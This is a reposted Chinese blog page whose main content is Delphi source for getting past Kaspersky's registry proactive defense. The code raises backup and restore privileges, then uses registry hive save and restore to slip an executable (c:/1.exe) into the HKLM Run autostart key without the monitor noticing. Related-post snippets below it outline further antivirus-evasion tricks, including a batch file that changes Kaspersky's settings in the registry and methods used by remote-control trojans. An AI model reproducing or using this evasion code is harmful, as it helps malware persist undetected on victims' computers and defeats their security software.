过卡巴注册表主动防御

最新推荐文章于 2018-10-19 17:23:43 发布
转载 最新推荐文章于 2018-10-19 17:23:43 发布 · 1k 阅读 · 0
标签
#token #string #user #button #function
#integer

 unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls;

type
  TForm1 = class(TForm)
    Button1: TButton;
    procedure Button1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}
procedure SetPrivilege;
Const
  ADJUST_PRIV  =  TOKEN_QUERY  or  TOKEN_ADJUST_PRIVILEGES;
  SHTDWN_PRIV  ='SeBackupPrivilege'; 
  //SeBackupPrivilege 备份文件和目录。
//允许用户绕过文件和目录的权限来做备份。只有当应用程序尝试访问NTFS备份API时才检查这个特
//权。默认情况下,这个特权分配给Administrators和Backup Operators。
  PRIV_SIZE      =  sizeOf(TTokenPrivileges);
var 
  TokenPriv,  Dummy:  TTokenPrivileges;
  Token:  THandle;
  Len:DWORD;
begin 
  OpenProcessToken(GetCurrentProcess(),  ADJUST_PRIV,  Token); 
  LookupPrivilegeValue(nil,  SHTDWN_PRIV,TokenPriv.Privileges[0].Luid);
  TokenPriv.Privileges[0].Attributes  :=  SE_PRIVILEGE_ENABLED;
  TokenPriv.PrivilegeCount  :=  1;
  AdjustTokenPrivileges(Token,  false,  TokenPriv,  PRIV_SIZE,Dummy,  Len);
end;

procedure SetPrivilege2;
var
  TPPrev,TP: TTokenPrivileges;
  TokenHandle: THandle;
  dwRetLen: DWORD;
  lpLuid: TLargeInteger;
begin
  OpenProcessToken(GetCurrentProcess,TOKEN_ALL_ACCESS,TokenHandle);
  if(LookupPrivilegeValue(Nil,'SeRestorePrivilege',lpLuid))then
//SeRestorePrivilege
//恢复文件和目录。
//允许用户绕过文件及目录权限来恢复备份文件。默认情况下Administrators和Backup
  begin
    TP.PrivilegeCount:=1;
    TP.Privileges[0].Attributes:=SE_PRIVILEGE_ENABLED;
    TP.Privileges[0].Luid:=lpLuid;
    AdjustTokenPrivileges(TokenHandle,False,TP,SizeOf(TPPrev),TPPrev,dwRetLen);
  end;
  CloseHandle(TokenHandle);
end;

function addreg(key:Hkey; subkey,name,value:string):boolean; 
var
regkey:hkey;
begin
  result := false;
  RegCreateKey(key,PChar(subkey),regkey);
  if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
    result := true;
  RegCloseKey(regkey);
end;

function SaveKey2(key:integer;subkey,filename:string):Boolean;
var
  SKey: HKEY;
begin
  SetPrivilege;
  Result := false;
  if key = 1 then begin
  RegOpenKey(HKEY_CURRENT_USER,PChar(subkey),SKey);
  end
  else
  begin
  RegOpenKey(HKEY_LOCAL_MACHINE,PChar(subkey),SKey);
  end;
  if SKey <> 0 then
  try
    Result := (RegSaveKey(SKey, PChar(FileName), nil) = ERROR_SUCCESS);
  finally
    RegCloseKey(SKey);
  end;
end;

procedure regstore2(key:integer;subkey,hfile:string);
var
  key2: hkey;
begin
  SetPrivilege2;
  if key=1 then
  begin
  RegOpenKey(HKEY_CURRENT_USER,PChar(subkey),key2)
  end
  else begin
  RegOpenKey(HKEY_LOCAL_MACHINE,PChar(subkey),key2);
  end;
  if key2<>0 then RegRestoreKey(key2,PChar(hfile),8);
  RegCloseKey(key2);
end;

procedure regstore(exefile:string);
var
  key:HKEY;
  I:Integer;
begin
  SaveKey2(2,PChar('SOFTWARE/Microsoft/Windows/CurrentVersion/Run'),'c:/1.hiv');
  RegCreateKey(HKEY_CURRENT_USER,PChar('Software/fengzi'),key);
  for i := 1 to 5 do  regstore2(1,'Software/fengzi','c:/1.hiv');
  addreg(HKEY_CURRENT_USER,'Software/fengzi','IeServer',exefile);
  SaveKey2(1,PChar('Software/fengzi'),'c:/2.hiv');
  for i := 1 to 5 do  regstore2(2,PChar('SOFTWARE/Microsoft/Windows/CurrentVersion/Run'),'c:/2.hiv');
  RegDeleteKey(HKEY_CURRENT_USER,'Software/fengzi');
  RegCloseKey(key);
  DeleteFile('c:/1.hiv');
  DeleteFile('c:/2.hiv');
end;

procedure TForm1.Button1Click(Sender: TObject);
begin
regstore('c:/1.exe');
end;

end.

DDL注入器(封包)
02-16
DDL注入器(封包) 封包可以
获取任意进程的命令行参数
yu_sn0w的博客
10-19 1467
来源网络,亲测有效Delphi 2009 unit Unit2; interface     function GetProcessCmdLine(PID: Cardinal): string; implementation uses Windows; const   SystemHandleInformation = 16;   ProcessBasicInformation = 0...
adjust_token_privilege
cuishuai1990的博客
02-03 517
关于在 DELPHI 中如何提升进程令牌2007年01月24日 星期三 06:04 P.M.近一段时间在用DELPHI写个程序,当我写到一个结束其他进程的模块的时候有时不成功,那是因为其他进程,如病毒进程的权限高,通过常规的结束...
修改进程权限api详解
Armstronghappy的专栏
04-13 2157
获取进程权限令牌句柄 OpenProcessToken(ProcessHandle:THandle(进程句柄),TOKEN_ALL_ACCESS,hToken: THandle(获得的进程令牌句柄)) 获取各种权限对应的ID LookupPrivilegeValue(nil, 'SeDebugPrivilege'(权限的名字), Luid(获取的权限ID)); 修改进程权限 Adjust
编程对付卡巴的自启动监控
03-17 891
众所周知,卡巴主动防御的自启动监控超级变态,但是还是对程序有分析的。举个简单的例子来说,如果你的添加自启动的命令为shell   autorun,vbhide卡巴就叫了,autorun是一个过程了,但是如果你改成这样shell   autorun,vbNormalFocus ,或许就杀猪声就没了。这里说说几种现在可以让杀猪声消失的几种办法。1,这是网上广为流传的办法,就是把启动项添加到"ALLUS
一个过主动防御的方法
her0z的专栏
03-28 749
今天拿到一个过kaspersky主动防御而不改系统时间的远控马,于是分析下吧: 首先当然是创建线程: push    esp             ; lpThreadId push    0               ; dwCreationFlags push    0               ; lpParameter push    offset sub_409178 ; lp
卡巴司机如此重大bug为何视而不改?
weixin_33717117的博客
05-18 95
在论坛转的时候发现了这片帖子--《卡巴司机如此重大bug为何视而不改?》 卡巴死机通过论坛枪手把自己吹得神乎其神,并且大肆诋毁瑞星。开始曾经对这些鬼话深信不疑,其实事后想想,自己何尝不被卡巴的人忽悠过,卡巴死机真的那么 好么?论杀毒:很多病毒都可以秒杀卡巴,论服务,这么大的一个bug卡巴为何久久都不改进?一个小小  病毒工作机制如下      1检查被感染机器是否...
取消卡巴斯基的“全盘扫描”提示
Jonly的专栏
10-17 2544
能否取消卡巴斯基的“全盘扫描”提示?   五、在还原系统或重装系统时,请务必做好病毒库的
针对卡巴斯基2010的免杀研究
yangshen998
11-02 98
卡巴斯基2010在针对数字签名和系统文件防护变的非常严格,注册表更不说,经过这么多年的升级基本上没有可以利用的价值,卡巴斯基2010之前版本可以通过修改感染系统文件进行启动,绕过监控,只需要给PE文件添加一个数字签名,由于卡吧监控并不严格只是判断是否加了签名,而没有判断签名是否正确,所以给很多马留了生存空间。 但是,卡巴2010后的版本就没有这么幸运了,对系统目录文件的验证变的十分严格,...
浅谈主动防御技术 (转载)
03-08 877
这篇文章中我觉得还是有点可取之处,就是把启发式技术和行为阻止技术的介绍,不过都是很浅.   正如我们所看到的一样,计算机病毒(泛指所有的恶意程序或代码)攻击目前已经在IT安全威胁中占了头把交椅。当前的病毒攻击不仅仅会给计算机用户带来经济损失,还为其它安全威胁提供了途径……   正如我们所看到的一样,计算机病毒(泛指所有的恶意程序或代码)攻击目前已经在IT安全威胁中占了头把交椅。当前的病毒
注册表监控弱点演示程序 v0.2 逆向ASM源码及相关资料
zgcheng的专栏
04-10 848
 链 接: http://bbs.pediy.com/showthread.php?t=62686注册表监控弱点演示程序相关信息:http://www.xyzreg.net/     目前主动防御的概念已经深入人心,许多杀毒软件、软件防火以及HIPS都具有了注册表监控功能,防止自启动项以及IE相关键值被修改,对防范病毒木马以及流氓软件等恶意程序起到了不小的作用。但是现有的注册表监控并非无懈可击
kav 优化设置(转)
weixin_33798152的博客
05-23 322
一.在第一次安装的时候卡巴斯基会提示你全盘扫描,推荐执行一下.当然最好是在你睡觉的时候.只是会花点时间.初次使用无须任何改动,全盘扫描(一定要有耐心哦.呵呵) 二.设置: (在你升级完最新的病毒库后,重启一次后.我样接来的工作就是优化了) A./保护/主动防御/ (这里是到卡巴斯基的设置中相应的位置,下面同理就不再描述了.)   1.除"程序完整性保护"全部打勾 (程序完整性保护太占CPU拖...
绕过卡巴主动防御的批处理
09-04 1099
@echo offtasklist|findstr /i "avp.exe" && (reg add HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings" /v "CheckTray" /t REG_DWORD /d 0 /f >nulreg add HKEY_LOCAL_MACHINE/SOFTWARE/Kaspers
突破主动防御注册表监控篇
03-29 1529
文章作者:xyzreg [E.S.T] 目前主动防御的概念已经深入人心,许多杀毒软件、软件防火以及HIPS都具有了注册表监控功能,防止自启动项以及IE相关键值被修改,对防范病毒木马以及流氓软件等恶意程序起到了不小的作用。但是现有的注册表监控并非无懈可击,我们仍然可以绕过注册表监控修改注册表。   绕过注册表监控的方法不止一种,应根据不同情况灵活运用。 除了本演示程序使用的操作HIVE文件修改注册表
瑞星2008主动防御技术分析
08-15 1745
看到瑞星2008发布了所谓”超越传统HIPS”、“监控功能比传统HIPS的更全面"的功能,当时为之震惊,难道国产杀毒软件终于开发出了强大的HIPS功能了?立刻下了测试版安装,打算进行测试。起初考虑,发布文章中说得如此强大的主动防御技术,是不是需要逆向分析才能清楚呢?可惜,事实告诉我们,灰盒就够了。使用Rootkit Unhooker/Gmer工具对安装瑞星2008的机器进行扫描即可得出瑞星的保护究
卡巴斯基主动防御
wy616的专栏
10-10 896
绕过主动防御 木马病毒刺穿卡巴斯基ZDNet 安全频道频道 更新时间:2008-06-28 作者: 来源:论坛整理本文关键词:卡巴斯基 病毒 木马  安全诊所的值班医生张帆,正在查询一些资料。这时推门进入一位病人。病人称他最近一段时间,很多和自己相关的网络账户都被盗了,想让医生看看是什么原因。   张帆医生询问患者有没有安装杀毒软件。患者称自己安
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值